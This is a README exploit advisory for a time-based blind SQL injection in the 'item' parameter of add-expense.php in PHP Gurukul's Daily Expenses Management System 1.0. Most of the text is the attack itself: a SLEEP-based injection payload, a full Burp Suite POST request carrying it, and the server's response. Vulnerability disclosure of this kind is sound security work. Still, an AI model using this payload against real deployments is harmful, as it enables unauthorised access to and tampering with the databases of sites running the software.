README.md

Exploit Title: Daily Expenses Management System 1.0 - 'item' SQL Injection (Time-based blind)

Description:

Daily Expenses Management System version 1.0, developed by PHP Gurukul, contains a time-based blind SQL injection vulnerability in the 'add-expense.php' page. An attacker can exploit the 'item' parameter in a POST request to execute arbitrary SQL commands in the backend database. This can be done by injecting specially crafted SQL queries that make the database perform time-consuming operations, thereby confirming the presence of the SQL injection vulnerability based on the delay in the server's response.

• Date: 12-03-2024
• Exploit Author: Ayush Patidar
• Vendor Homepage: https://phpgurukul.com/
• Software Link: https://phpgurukul.com/daily-expense-tracker-using-php-and-mysql/
• Version: 1.0
• Tested on: Windows & Xampp

---

Feature: Add Expenses

• Vulnerable file: add-expense.php
• Vulnerable parameters:
  • item
  • costitem

---

PoC

• URL: http://example.com/dets/add-expense.php
• Method: POST

---

Payload

dateexpense=1337-11-11&item=1' AND (SELECT 8429 FROM (SELECT(SLEEP(5)))IWeV) AND 'hmPP'='hmPP&costitem=2&submit=

Burpsuite Requests

POST /dets/add-expense.php HTTP/1.1
Host: example.com
Content-Length: 139
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://example.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://example.com/dets/add-expense.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,hi;q=0.8
Cookie: PHPSESSID=ofjno6jio72kc9u6tnbvu1cit7
Connection: close

dateexpense=2024-03-12&item=1%27+AND+%28SELECT+8429+FROM+%28SELECT%28SLEEP%285%29%29%29IWeV%29+AND+%27hmPP%27%3D%27hmPP&costitem=10&submit=

Burpsuite Response

HTTP/1.1 200 OK
Date: Wed, 13 Mar 2024 00:10:39 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6455
Connection: close
Content-Type: text/html; charset=UTF-8

<script>alert('Expense has been added');</script><script>window.location.href='manage-expense.php'</script><!DOCTYPE html>
<html>
<head>
...